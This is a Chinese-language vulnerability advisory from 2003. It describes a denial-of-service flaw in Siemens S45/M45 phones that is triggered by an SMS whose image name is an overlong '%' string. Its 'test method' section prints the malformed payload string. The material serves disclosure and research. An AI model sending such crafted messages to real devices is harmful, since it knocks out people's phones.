发布日期：2003-05-06
更新日期：2003-05-12

受影响系统：

Siemens Mobile Phone S45
Siemens Mobile Phone M45

描述：

---

BUGTRAQ  ID: 7507

西门子45系列手机存在漏洞。

西门子45系列手机对短消息图象附件处理存在问题，远程程攻击者可以利用这个漏洞发送畸形短消息对目标用户手机进行拒绝服务攻击。

由于对SMS消息中包含的超大图象名缺少正确的边界缓冲区检查，攻击者如果使用的图象名称为'% 157字符'的短消息提交给目标用户，45系列西门子手机就会挂起。

<*来源：subj （r2subj3ct@dwcgr0up.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=105224002729503&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

subj （r2subj3ct@dwcgr0up.com）提供了如下测试方法：

** Exploit **
" %..........
............
............
............
............
............
............
............
............
............
............
............
............
... "

or

" % [157 symbols of any dust "

建议：

---

厂商补丁：

Siemens
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.siemens-mobile.com

浏览次数：2702
严重程度：0（网友投票）